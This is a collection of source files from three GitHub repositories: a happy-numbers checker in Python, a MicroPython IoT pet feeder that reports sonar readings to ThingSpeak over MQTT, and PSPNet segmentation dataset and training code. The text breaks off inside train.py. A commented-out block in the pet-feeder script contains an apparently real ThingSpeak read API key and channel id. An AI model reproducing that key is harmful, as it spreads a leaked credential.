59,035,611
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8600000143051147, "alphanum_fraction": 0.8600000143051147, "avg_line_length": 24, "blob_id": "efd46d5d27b9d91a4d3b1c650d4b680bdc3e7cc9", "content_id": "11e27f743af493a75edcdb63369b06ad743bdd7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 50, "license_type": "no_license", "max_line_length": 34, "num_lines": 2, "path": "/README.md", "repo_name": "carloserodriguez2000/HappyNumbers", "src_encoding": "UTF-8", "text": "# HappyNumbers\nImplements Happy numbers algorithm\n" }, { "alpha_fraction": 0.3882825970649719, "alphanum_fraction": 0.39632394909858704, "avg_line_length": 33.896907806396484, "blob_id": "b0020729d61f3944482d33924545bfd175ba93f9", "content_id": "a0fa43f47ddd746da0fd0cdaa79ded1059e521f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3482, "license_type": "no_license", "max_line_length": 99, "num_lines": 97, "path": "/Main.py", "repo_name": "carloserodriguez2000/HappyNumbers", "src_encoding": "UTF-8", "text": "################################################################################\r\n#\r\ndef checkValidNumber( sLine):\r\n if( sLine.isnumeric()):\r\n return True\r\n else:\r\n return False\r\n \r\n################################################################################\r\n#\r\ndef makeNumList( sLine ):\r\n stringInteger = str(sLine)\r\n digitList = list()\r\n for ch in stringInteger:\r\n digitList.append(ch)\r\n return digitList\r\n\r\n################################################################################\r\n#\r\ndef buildHappySqrArray(digitList):\r\n happyArray=list()\r\n index=0\r\n listLength=len(digitList)\r\n while ( index < listLength):\r\n digit = digitList[index]\r\n happyArray.append(int(digit)**2)\r\n index+=1\r\n ## for digit in digitList:\r\n ## happyArray.append(int(digit))\r\n return happyArray\r\n\r\n################################################################################\r\n#\r\ndef calcHappySum( happySquareList):\r\n sumSqr = 0\r\n for num in happySquareList:\r\n sumSqr+=num\r\n return sumSqr\r\n\r\n################################################################################\r\n#\r\ndef checkValidHappy(happyArray):\r\n return True\r\n\r\n################################################################################\r\n#\r\ndef CyclicSeqFound(happySumList):\r\n notHappyPattern=[4,16,37,58,89,145,42,20,4]\r\n if(notHappyPattern[0] in happySumList):\r\n startIndex = happySumList.index(4) #find the first occurrance of 4\r\n if( (len(happySumList)-startIndex) >= len(notHappyPattern)):\r\n for num in notHappyPattern:\r\n if (num == happySumList[startIndex]):\r\n matching = True\r\n else:\r\n matching = False\r\n break\r\n startIndex+=1\r\n else: matching = False\r\n else:\r\n matching = False\r\n\r\n \r\n return matching\r\n \r\n################################################################################\r\n#\r\ndef main ():\r\n happySumList = list()\r\n continueLoop = True\r\n while (continueLoop == True):\r\n sLine = input( 'Enter a Number: ')\r\n if (checkValidNumber(sLine) == True):\r\n moreNums = True\r\n while (moreNums == True) :\r\n digitList = makeNumList( sLine) # list of separated digits\r\n happySquares = buildHappySqrArray(digitList) # List of squared digits\r\n sumOfSqr = calcHappySum(happySquares)\r\n happySumList.append(sumOfSqr) # Sum the squares and append to list\r\n sLine = sumOfSqr\r\n if(sumOfSqr == 1):\r\n print('Happy found', happySumList)\r\n moreNums = 
False\r\n            else:\r\n                if( CyclicSeqFound(happySumList)== True):\r\n                    print('NOT happy found', happySumList)\r\n                    moreNums = False\r\n                    \r\n            happySumList.clear()\r\n            continueLoop = (input(\"Press 1 to run again: \") == '1')\r\n        else :\r\n            print(\"Thank you for Playing. Bye.\")\r\n            continueLoop = False\r\n            \r\n################################################################################\r\n#\r\n################################################################################\r\nmain()\r\n" }, { "alpha_fraction": 0.4176136255264282, "alphanum_fraction": 0.46875, "avg_line_length": 28.114286422729492, "blob_id": "48e6f6068e9102ff500505d7cb13f70307d1e977", "content_id": "7539b3d9412bacce4a4c02f4281298c9d37c452e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 80, "num_lines": 35, "path": "/test.py", "repo_name": "carloserodriguez2000/HappyNumbers", "src_encoding": "UTF-8", "text": "\r\n################################################################################\r\n#\r\ndef CyclicSeqFound(happySumList):\r\n\r\n    print( happySumList)\r\n    #iterate until first 4 is found\r\n    #iterated for pattern \"4,16,37,58,89,145,42,20,4\"\r\n    notHappyPattern=[4,16,37,58,89,145,42,20,4]\r\n    startIndex = happySumList.index(4) #find the first occurrence of 4\r\n    matching = False # default when the pattern cannot fit\r\n    if( (len(happySumList)-startIndex) >= len(notHappyPattern)):\r\n        for num in notHappyPattern:\r\n            print( num,happySumList[startIndex])\r\n            if (num == happySumList[startIndex]):\r\n                matching = True\r\n            else:\r\n                matching = False\r\n                break\r\n            startIndex+=1\r\n        \r\n    return matching\r\n\r\n\r\n################################################################################\r\n#\r\ndef main():\r\n\r\n    happySumList=[4,4,37,58,89,145,42,20,4]\r\n    found = CyclicSeqFound(happySumList)\r\n    if (found == True):\r\n        print ( 'cyclic found')\r\n    else:\r\n        print ( 'cyclic not found')\r\n\r\n\r\nmain()\r\n" } ]
3
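Main.py in the record above declares a number unhappy by matching the known cycle 4, 16, 37, 58, 89, 145, 42, 20, 4. An equivalent, shorter check just remembers every digit-square sum seen so far; any repeat proves the sequence cycles and the number is not happy. A sketch of that alternative (not code from the repo):

    def is_happy(n):
        seen = set()
        while n != 1 and n not in seen:
            seen.add(n)                              # remember this sum
            n = sum(int(d) ** 2 for d in str(n))     # sum of squared digits
        return n == 1                                # reached 1 -> happy

    # is_happy(19) -> True; is_happy(4) -> False (enters the cycle above)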
danialkhilji/iot_pet_feeder
https://github.com/danialkhilji/iot_pet_feeder
081391ebcd63bc5e7f526f03bce24f313c676b8b
7165692b55833c81f4203a0204b18b3dcfd2b352
9879c462451185e60f14bcbcfe86499bee34e877
refs/heads/master
2023-05-29T01:45:26.234639
2021-06-20T14:11:09
2021-06-20T14:11:09
378,656,067
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.794366180896759, "alphanum_fraction": 0.794366180896759, "avg_line_length": 87.75, "blob_id": "0d3baad547855b074130de4ca01967f5e3c3ceb", "content_id": "55aa28cda64efbb79b39cd1672d9d6d99b4a5c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 355, "license_type": "no_license", "max_line_length": 143, "num_lines": 4, "path": "/README.md", "repo_name": "danialkhilji/iot_pet_feeder", "src_encoding": "UTF-8", "text": "Automatic pet feeder using Internet of Things (IoT).\nIt ensures that feed is available when it's time for the pet to eat.\nThis way the pet's diet is controlled and the pet can be fed even when the owner is not at home.\nOwner can check the status of feed using ThingSpeak and the ThingView app. IFTTT messaging is used to alert the owner when feed is at low levels.\n" }, { "alpha_fraction": 0.5720224976539612, "alphanum_fraction": 0.6153093576431274, "avg_line_length": 26.608108520507812, "blob_id": "1ae372d2905bb841b6420628ac8e8b2b1832582c", "content_id": "3611626dd95775d4897674b7c8eb7319642a0f7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4089, "license_type": "no_license", "max_line_length": 97, "num_lines": 148, "path": "/iot_pet_feeder.py", "repo_name": "danialkhilji/iot_pet_feeder", "src_encoding": "UTF-8", "text": "import machine\r\nimport time, urandom\r\nimport ssd1306 #display screen library\r\nfrom machine import Pin, I2C, PWM #to configure pins of sensors\r\n#display pins configuration\r\ni2c = I2C(-1, scl=Pin(22), sda=Pin(21), freq=100000)\r\ndisp = ssd1306.SSD1306_I2C(128, 64, i2c)\r\n#displaying text\r\ndisp.fill(0)\r\ndisp.text(\"Connecting to\", 0, 20)\r\ndisp.text(\"internet...\", 0, 40)\r\ndisp.show()\r\ntime.sleep(1)\r\n\r\n#To connect to the internet\r\nimport network\r\nwlan = network.WLAN(network.STA_IF) # create station interface\r\nwlan.active(True)       # activate the interface\r\nwlan.scan()             # scan for access points\r\nwlan.connect('wifi-name', 'wifi-password') # connect to an AP\r\nwlan.config('mac')      # get the interface's MAC address\r\nwlan.ifconfig()         # get the interface's IP/netmask/gw/DNS addresses\r\nif (wlan.isconnected() == False):\r\n    print('Connection unsuccessful')\r\n    disp.fill(0)\r\n    disp.text(\"Connection\", 20, 20)\r\n    disp.text(\"Failed!\", 20, 40)\r\n    disp.show()\r\n    time.sleep(1)\r\nelse:\r\n    print('Connection successful')\r\n    disp.fill(0)\r\n    disp.text(\"Connection\", 20, 20)\r\n    disp.text(\"successful!\", 20, 40)\r\n    disp.show()\r\n    time.sleep(1)\r\n\r\ndisp.fill(0)\r\ndisp.text(\"Connecting with\", 0, 20)\r\ndisp.text(\"MQTT Broker\", 20, 40)\r\ndisp.show()\r\ntime.sleep(1)\r\n#Connecting MQTTClient\r\nfrom umqtt.simple import MQTTClient\r\nserver = 'mqtt.thingspeak.com'\r\nc = MQTTClient('ESP32_danial', server, ssl=True) #ssl=True means TLS is enabled\r\nc.connect()\r\n\r\n#Thingspeak credentials\r\nCHANNEL_ID = \"\"\r\nAPI_KEY = \"\" #Write API Key from Thingspeak\r\ntopic = \"channels/\" + CHANNEL_ID + \"/publish/\" + API_KEY\r\n\r\nprint('Configuring I/O pins')\r\ndisp.fill(0)\r\ndisp.text(\"Configuring\",20, 20)\r\ndisp.text(\"I/O pins\", 20, 40)\r\ndisp.show()\r\ntime.sleep(1)\r\nfrom hcsr04 import HCSR04 #sonar library\r\ntime.sleep(1)\r\n#sonar pins\r\nsonar = HCSR04(trigger_pin=13, echo_pin=12, echo_timeout_us=1000000)\r\n#servo pins\r\np14 = machine.Pin(14)\r\nservo = machine.PWM(p14,freq=50,duty=77)\r\n\r\n\r\n#for listening to thingspeak\r\n#import urllib2\r\n#import json #not installing\r\n\r\nprint('Starting while loop')\r\nwhile True: \r\n    distance = sonar.distance_cm()\r\n    print('Sonar distance: ', distance)\r\n    disp.fill(0)\r\n    
disp.text(\"Sonar distance: \", 0, 20)\n disp.text(str(distance), 30, 40)\n disp.show()\n time.sleep(2)\n \n if (distance <= 20): #change this to > instead of <\n print(\"Plate is empty!\")\n disp.fill(0)\n disp.text(\"Plate is empty!\", 0, 20)\n disp.text(\"Refilling...\", 0, 40)\n disp.show()\n time.sleep(1)\n #Refilling the plate\n servo.duty(20)\n time.sleep(1)\n print('Rotating')\n servo.duty(127)\n time.sleep(2)\n print('Rotating back')\n servo.duty(20)\n time.sleep(1)\n print(\"Plate filled\")\n disp.fill(0)\n disp.text(\"Plate refilled!\", 0, 30)\n disp.show()\n time.sleep(1)\n else:\n print(\"Food not finished\")\n disp.fill(0)\n disp.text(\"Plate is full\", 0, 30)\n disp.show()\n time.sleep(1)\n \n print('Publishing information')\n disp.fill(0)\n disp.text(\"Publishing info\", 0, 30)\n disp.show()\n time.sleep(1)\n \n #Publishing information on mqtt broker\n dst = \"field1=\"+str(distance) #sonar distance\n #c.publish(topic, fld1)\n if (distance <= 20):\n msg = 'Plate is empty!\\nRefilling...'\n else:\n msg = 'Plate is full!'\n \n #msg = \" \" + str(msg)\n #combined = dst + msg\n time.sleep(10)\n c.publish(topic, dst)\n \n print('Data published on broker') \n disp.fill(0)\n disp.text(\"Published!\", 0, 30)\n disp.show()\n time.sleep(1)\n #to read data from thingspeak\n# print('listening to thingspeak')\n# read_api = '9P3W6DR4JAJSOZNE'\n# channel_id = '1349736'\n# TS = urllib2.urlopen(\"http://api.thingspeak.com/channels/%s/feeds/last.json?api_key=%s\" \\\n# % (CHANNEL_ID,READ_API_KEY))\n# response = TS.read()\n# data=json.loads(response)\n# a = data['field1']\n# print('data received: ')\n# print (a)\n# time.sleep(1) \n# TS.close()\n time.sleep(1)\n\n\n\n" } ]
2
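The feeder sketch above publishes "field1=<distance>" to a ThingSpeak MQTT topic built from the channel id and write key. For several values per update, ThingSpeak accepts URL-style pairs joined with '&'; a hedged sketch reusing the record's client and topic, where field2 as a refill flag is an assumption, not part of the original code:

    def publish_reading(client, topic, distance_cm, refilled):
        # field1 mirrors the record; field2 is a hypothetical refill flag
        payload = "field1=" + str(distance_cm) + "&field2=" + ("1" if refilled else "0")
        client.publish(topic, payload)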
wutianyiRosun/PSPNet_PyTorch
https://github.com/wutianyiRosun/PSPNet_PyTorch
7d122f10cc81b65afe682692c59c445084735589
9ea95a81193885c355f545f3e9c359d261b2172f
4104faa977228dbac58e075a575405e18f42e2b8
refs/heads/master
2020-03-17T06:41:20.533395
2018-05-14T14:17:58
2018-05-14T14:17:58
133,365,342
23
2
null
null
null
null
null
[ { "alpha_fraction": 0.782608687877655, "alphanum_fraction": 0.782608687877655, "avg_line_length": 22, "blob_id": "dbc45afc28102941d66615913ad7b43147e6d610", "content_id": "82cbaf6031a3fb479faeaf558b6b48b4f0eb9171", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/pretrained/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "put init model on here\n" }, { "alpha_fraction": 0.5315181016921997, "alphanum_fraction": 0.5529031753540039, "avg_line_length": 35.72602844238281, "blob_id": "73026bb32b054ac365021481170250a05b1e41f0", "content_id": "909b9acfd41d4bde76ae2056d669602f7b886e74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8079, "license_type": "no_license", "max_line_length": 144, "num_lines": 219, "path": "/psp/cityscapes_datasets.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import torch\nimport os\nimport os.path as osp\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport collections\nimport torchvision\nimport cv2\nfrom torch.utils import data\n\n\nclass CityscapesDataSet(data.Dataset):\n \"\"\" \n CityscapesDataSet is employed to load train set\n Args:\n root: the Cityscapes dataset path, \n cityscapes\n ├── gtFine\n ├── leftImg8bit\n list_path: cityscapes_train_list.txt, include partial path\n mean: bgr_mean (73.15835921, 82.90891754, 72.39239876)\n\n \"\"\"\n def __init__(self, root, list_path, max_iters=None, crop_size=(512, 1024), mean=(128, 128, 128), scale=True, mirror=True, ignore_label=255):\n self.root = root\n self.list_path = list_path\n self.crop_h, self.crop_w = crop_size\n self.scale = scale\n self.ignore_label = ignore_label\n self.mean = mean\n self.is_mirror = mirror\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n if not max_iters==None:\n self.img_ids = self.img_ids * int(np.ceil(float(max_iters) / len(self.img_ids)))\n self.files = []\n\n # for split in [\"train\", \"trainval\", \"val\"]:\n for name in self.img_ids:\n img_file = osp.join(self.root, name.split()[0])\n #print(img_file)\n label_file = osp.join(self.root, name.split()[1])\n #print(label_file)\n self.files.append({\n \"img\": img_file,\n \"label\": label_file,\n \"name\": name\n })\n\n print(\"length of dataset: \",len(self.files))\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, index):\n datafiles = self.files[index]\n image = cv2.imread(datafiles[\"img\"], cv2.IMREAD_COLOR)\n label = cv2.imread(datafiles[\"label\"], cv2.IMREAD_GRAYSCALE)\n size = image.shape\n name = datafiles[\"name\"]\n if self.scale:\n f_scale = 0.5 + random.randint(0, 15) / 10.0 #random resize between 0.5 and 2 \n image = cv2.resize(image, None, fx=f_scale, fy=f_scale, interpolation = cv2.INTER_LINEAR)\n label = cv2.resize(label, None, fx=f_scale, fy=f_scale, interpolation = cv2.INTER_NEAREST)\n\n image = np.asarray(image, np.float32)\n \n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n img_h, img_w = label.shape\n pad_h = max(self.crop_h - img_h, 0)\n pad_w = max(self.crop_w - img_w, 0)\n if pad_h > 0 or pad_w > 0:\n img_pad = cv2.copyMakeBorder(image, 0, pad_h, 0, \n pad_w, cv2.BORDER_CONSTANT, \n value=(0.0, 0.0, 0.0))\n label_pad = cv2.copyMakeBorder(label, 0, pad_h, 0, \n pad_w, cv2.BORDER_CONSTANT,\n value=(self.ignore_label,))\n else:\n img_pad, label_pad = image, 
label\n\n img_h, img_w = label_pad.shape\n h_off = random.randint(0, img_h - self.crop_h)\n w_off = random.randint(0, img_w - self.crop_w)\n # roi = cv2.Rect(w_off, h_off, self.crop_w, self.crop_h);\n image = np.asarray(img_pad[h_off : h_off+self.crop_h, w_off : w_off+self.crop_w], np.float32)\n label = np.asarray(label_pad[h_off : h_off+self.crop_h, w_off : w_off+self.crop_w], np.float32)\n \n \n image = image.transpose((2, 0, 1)) # NHWC -> NCHW\n \n if self.is_mirror:\n flip = np.random.choice(2) * 2 - 1\n image = image[:, :, ::flip]\n label = label[:, ::flip]\n\n return image.copy(), label.copy(), np.array(size), name\n\nclass CityscapesValDataSet(data.Dataset):\n \"\"\" \n CityscapesDataSet is employed to load val set\n Args:\n root: the Cityscapes dataset path, \n cityscapes\n ├── gtFine\n ├── leftImg8bit\n list_path: cityscapes_val_list.txt, include partial path\n\n \"\"\"\n def __init__(self, root, list_path, f_scale=0.5, mean=(128, 128, 128), ignore_label=255):\n self.root = root\n self.list_path = list_path\n self.ignore_label = ignore_label\n self.mean = mean\n self.f_scale = f_scale\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n self.files = []\n for name in self.img_ids:\n img_file = osp.join(self.root, name.split()[0])\n #print(img_file)\n label_file = osp.join(self.root, name.split()[1])\n #print(label_file)\n image_name = name.strip().split()[0].strip().split('/',3)[3].split('.')[0]\n #print(\"image_name: \",image_name)\n self.files.append({\n \"img\": img_file,\n \"label\": label_file,\n \"name\": image_name\n })\n\n print(\"length of dataset: \",len(self.files))\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, index):\n datafiles = self.files[index]\n image = cv2.imread(datafiles[\"img\"], cv2.IMREAD_COLOR)\n label = cv2.imread(datafiles[\"label\"], cv2.IMREAD_GRAYSCALE)\n size = image.shape\n name = datafiles[\"name\"]\n if self.f_scale !=1:\n image = cv2.resize(image, None, fx=self.f_scale, fy=self.f_scale, interpolation = cv2.INTER_LINEAR)\n #label = cv2.resize(label, None, fx=self.f_scale, fy=self.f_scale, interpolation = cv2.INTER_NEAREST)\n\n image = np.asarray(image, np.float32)\n\n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n image = image.transpose((2, 0, 1)) # NHWC -> NCHW\n \n #print('image.shape:',image.shape)\n return image.copy(), label.copy(), np.array(size), name\n\nclass CityscapesTestDataSet(data.Dataset):\n \"\"\" \n CityscapesDataSet is employed to load test set\n Args:\n root: the Cityscapes dataset path, \n cityscapes\n ├── gtFine\n ├── leftImg8bit\n list_path: cityscapes_test_list.txt, include partial path\n\n \"\"\"\n def __init__(self, root, list_path='test.txt', f_scale=1, mean=(128, 128, 128), ignore_label=255, set='test'):\n self.root = root\n self.list_path = list_path\n self.ignore_label = ignore_label\n self.mean = mean\n self.f_scale = f_scale\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n self.files = []\n self.set = set\n for name in self.img_ids:\n #img_file = osp.join(self.root, \"leftImg8bit/%s/%s\" % (self.set, name))\n img_file = osp.join(self.root, name.strip())\n image_name = name.strip().split('/')[3].split('.')[0]\n self.files.append({\n \"img\": img_file,\n \"name\": image_name\n })\n print(\"lenth of dataset: \", len(self.files))\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, index):\n datafiles = self.files[index]\n\n #image = Image.open(datafiles[\"img\"]).convert('RGB')\n image = cv2.imread(datafiles[\"img\"], 
cv2.IMREAD_COLOR)\n name = datafiles[\"name\"]\n\n # resize\n if self.f_scale !=1:\n image = cv2.resize(image, None, fx=self.f_scale, fy=self.f_scale, interpolation = cv2.INTER_LINEAR)\n image = np.asarray(image, np.float32)\n\n size = image.shape\n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n image = image.transpose((2, 0, 1))\n\n return image.copy(), np.array(size), name\n\n\nif __name__ == '__main__':\n #dst = CityscapesDataSet(\"/home/wty/AllDataSet/CityScapes\",\n # '/home/wty/AllDataSet/CityScapes/cityscapes_train_list.txt', scale=False)\n dst = CityscapesValDataSet(\"/home/wty/AllDataSet/CityScapes\",\n '/home/wty/AllDataSet/CityScapes/cityscapes_val_list.txt')\n trainloader = data.DataLoader(dst, batch_size=3)\n for i, data in enumerate(trainloader):\n imgs, labels, size, name = data\n if i == 0:\n print(name)\n print(size)\n" }, { "alpha_fraction": 0.6053426861763, "alphanum_fraction": 0.6242274641990662, "avg_line_length": 40.96541976928711, "blob_id": "a1135885df99d5b38c42dc66b7a29bf77f99d065", "content_id": "ec77e0e8ce8470c69ad6d508b40091360552ed84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14562, "license_type": "no_license", "max_line_length": 152, "num_lines": 347, "path": "/train.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import argparse\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nimport numpy as np\nimport pickle\nimport cv2\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport scipy.misc\nimport torch.backends.cudnn as cudnn\nimport sys\nimport os\nimport os.path as osp\nfrom psp.model import PSPNet\nfrom psp.loss import CrossEntropy2d\nfrom psp.voc12_datasets import VOCDataSet\nfrom psp.cityscapes_datasets import CityscapesDataSet\nimport matplotlib.pyplot as plt\nimport random\nimport timeit\n\nstart = timeit.default_timer()\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n \n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"PSPnet Network\")\n\n # optimatization configuration\n parser.add_argument(\"--is-training\", action=\"store_true\", \n help=\"Whether to updates the running means and variances during the training.\")\n parser.add_argument(\"--learning-rate\", type=float, default= 0.001, \n help=\"Base learning rate for training with polynomial decay.\") #0.001\n parser.add_argument(\"--weight-decay\", type=float, default= 0.0001, \n help=\"Regularisation parameter for L2-loss.\") # 0.0005\n parser.add_argument(\"--momentum\", type=float, default= 0.9, \n help=\"Momentum component of the optimiser.\")\n parser.add_argument(\"--power\", type=float, default= 0.9, \n help=\"Decay parameter to compute the learning rate.\")\n\n # dataset information\n parser.add_argument(\"--dataset\", type=str, default='cityscapes',\n help=\"voc12, cityscapes, or pascal-context.\")\n parser.add_argument(\"--random-mirror\", action=\"store_true\",\n help=\"Whether to randomly mirror the inputs during the training.\")\n parser.add_argument(\"--random-scale\", action=\"store_true\",\n help=\"Whether to randomly scale the inputs during the training.\")\n\n parser.add_argument(\"--not-restore-last\", action=\"store_true\",\n help=\"Whether to not restore last (FC) layers.\")\n parser.add_argument(\"--random-seed\", type=int, default= 1234,\n help=\"Random seed to have reproducible results.\")\n parser.add_argument('--logFile', default='log.txt', 
\n help='File that stores the training and validation logs')\n # GPU configuration\n parser.add_argument(\"--cuda\", default=True, help=\"Run on CPU or GPU\")\n parser.add_argument(\"--gpus\", type=str, default=\"0,1,2,3\", help=\"choose gpu device.\")\n\n\n return parser.parse_args()\n\nargs = get_arguments()\n\ndef configure_dataset_init_model(args):\n if args.dataset == 'voc12':\n\n args.batch_size = 10# 1 card: 5, 2 cards: 10 Number of images sent to the network in one step, 16 on paper\n args.maxEpoches = 15 # 1 card: 15, 2 cards: 15 epoches, equal to 30k iterations, max iterations= maxEpoches*len(train_aug)/batch_size_per_gpu'),\n args.data_dir = '/home/wty/AllDataSet/VOC2012' # Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/VOC2012/train_aug.txt' # Path to the file listing the images in the dataset\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.input_size = '473,473' #Comma-separated string with height and width of images\n args.num_classes = 21 #Number of classes to predict (including background)\n\n args.img_mean = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)\n # saving model file and log record during the process of training\n\n #Where restore model pretrained on other dataset, such as COCO.\")\n args.restore_from = './pretrained/MS_DeepLab_resnet_pretrained_COCO_init.pth'\n args.snapshot_dir = './snapshots/voc12/' #Where to save snapshots of the model\n args.resume = './snapshots/voc12/psp_voc12_3.pth' #checkpoint log file, helping recovering training\n \n\n elif args.dataset == 'cityscapes':\n args.batch_size = 8 #Number of images sent to the network in one step, batch_size/num_GPU=2\n args.maxEpoches = 60 #epoch nums, 60 epoches is equal to 90k iterations, max iterations= maxEpoches*len(train)/batch_size')\n # 60x2975/2=89250 ~= 90k, single_GPU_batch_size=2\n args.data_dir = '/home/wty/AllDataSet/CityScapes' # Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/Cityscapes/cityscapes_train_list.txt' # Path to the file listing the images in the dataset\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.input_size = '720,720' #Comma-separated string with height and width of images\n args.num_classes = 19 #Number of classes to predict (including background)\n\n args.img_mean = np.array((73.15835921, 82.90891754, 72.39239876), dtype=np.float32)\n # saving model file and log record during the process of training\n\n #Where restore model pretrained on other dataset, such as coarse cityscapes\n args.restore_from = './pretrained/resnet101_pretrained_for_cityscapes.pth'\n args.snapshot_dir = './snapshots/cityscapes/' #Where to save snapshots of the model\n args.resume = './snapshots/cityscapes/psp_cityscapes_12_3.pth' #checkpoint log file, helping recovering training\n \n else:\n print(\"dataset error\")\n\n\n\ndef loss_calc(pred, label):\n \"\"\"\n This function returns cross entropy loss for semantic segmentation\n \"\"\"\n # out shape batch_size x channels x h x w -> batch_size x channels x h x w\n # label shape h x w x 1 x batch_size -> batch_size x 1 x h x w\n label = Variable(label.long()).cuda()\n criterion = torch.nn.CrossEntropyLoss(ignore_index=args.ignore_label).cuda()\n \n return criterion(pred, label)\n\n\ndef lr_poly(base_lr, iter, max_iter, power):\n return base_lr*((1-float(iter)/max_iter)**(power))\n\n\ndef get_1x_lr_params_NOscale(model):\n \"\"\"\n This generator returns all the 
parameters of the net except for \n the last classification layer. Note that for each batchnorm layer, \n requires_grad is set to False in deeplab_resnet.py, therefore this function does not return \n any batchnorm parameter\n \"\"\"\n b = []\n if torch.cuda.device_count() == 1:\n b.append(model.conv1)\n b.append(model.bn1)\n b.append(model.layer1)\n b.append(model.layer2)\n b.append(model.layer3)\n b.append(model.layer4)\n else:\n b.append(model.module.conv1)\n b.append(model.module.bn1)\n b.append(model.module.layer1)\n b.append(model.module.layer2)\n b.append(model.module.layer3)\n b.append(model.module.layer4)\n \n for i in range(len(b)):\n for j in b[i].modules():\n jj = 0\n for k in j.parameters():\n jj+=1\n if k.requires_grad:\n yield k\n\ndef get_10x_lr_params(model):\n \"\"\"\n This generator returns all the parameters for the last layer of the net,\n which does the classification of pixel into classes\n \"\"\"\n b = []\n if torch.cuda.device_count() == 1:\n b.append(model.pspmodule.parameters())\n b.append(model.main_classifier.parameters())\n else:\n b.append(model.module.pspmodule.parameters())\n b.append(model.module.main_classifier.parameters())\n\n for j in range(len(b)):\n for i in b[j]:\n yield i\n \n \ndef adjust_learning_rate(optimizer, i_iter, max_iter):\n \"\"\"Sets the learning rate to the initial LR divided by 5 at 60th, 120th and 160th epochs\"\"\"\n lr = lr_poly(args.learning_rate, i_iter, max_iter, args.power)\n optimizer.param_groups[0]['lr'] = lr\n optimizer.param_groups[1]['lr'] = lr * 10\n return lr\n\ndef netParams(model):\n '''\n Computing total network parameters\n Args:\n model: model\n return: total network parameters\n '''\n total_paramters = 0\n for parameter in model.parameters():\n i = len(parameter.size())\n #print(parameter.size())\n p = 1\n for j in range(i):\n p *= parameter.size(j)\n total_paramters += p\n\n return total_paramters\n\ndef main():\n \n \n print(\"=====> Configure dataset and pretrained model\")\n configure_dataset_init_model(args)\n print(args)\n\n print(\" current dataset: \", args.dataset)\n print(\" init model: \", args.restore_from)\n print(\"=====> Set GPU for training\")\n if args.cuda:\n print(\"====> Use gpu id: '{}'\".format(args.gpus))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n if not torch.cuda.is_available():\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\n \n print(\"=====> Random Seed: \", args.random_seed)\n torch.manual_seed(args.random_seed)\n if args.cuda:\n torch.cuda.manual_seed(args.random_seed) \n\n h, w = map(int, args.input_size.split(','))\n input_size = (h, w)\n\n cudnn.enabled = True\n\n print(\"=====> Building network\")\n model = PSPNet(num_classes=args.num_classes)\n # For a small batch size, it is better to keep \n # the statistics of the BN layers (running means and variances)\n # frozen, and to not update the values provided by the pre-trained model. 
\n # If is_training=True, the statistics will be updated during the training.\n # Note that is_training=False still updates BN parameters gamma (scale) and beta (offset)\n # if they are presented in var_list of the optimiser definition.\n\n \n print(\"=====> Loading init weights, pretrained COCO for VOC2012, and pretrained Coarse cityscapes for cityscapes\")\n saved_state_dict = torch.load(args.restore_from)\n new_params = model.state_dict().copy()\n for i in saved_state_dict:\n #Scale.layer5.conv2d_list.3.weight\n #print(saved_state_dict[i].size())\n i_parts = i.split('.')\n #print('i_parts: ', i_parts)\n if not i_parts[1]=='layer5': #init model pretrained on COCO, class name=21, layer5 is ASPP\n new_params['.'.join(i_parts[1:])] = saved_state_dict[i]\n #print('copy {}'.format('.'.join(i_parts[1:])))\n model.load_state_dict(new_params)\n\n \n if args.cuda:\n if torch.cuda.device_count()>1:\n print(\"torch.cuda.device_count()=\",torch.cuda.device_count())\n model = torch.nn.DataParallel(model).cuda() #multi-card data parallel\n else:\n print(\"single GPU for training\")\n model = model.cuda() #1-card data parallel\n start_epoch=0\n \n print(\"=====> Whether resuming from a checkpoint, for continuing training\")\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n start_epoch = checkpoint[\"epoch\"] \n model.load_state_dict(checkpoint[\"model\"])\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n\n\n model.train()\n cudnn.benchmark = True\n\n if not os.path.exists(args.snapshot_dir):\n os.makedirs(args.snapshot_dir)\n\n print('=====> Computing network parameters')\n total_paramters = netParams(model)\n print('Total network parameters: ' + str(total_paramters))\n \n print(\"=====> Preparing training data\")\n if args.dataset == 'voc12':\n trainloader = 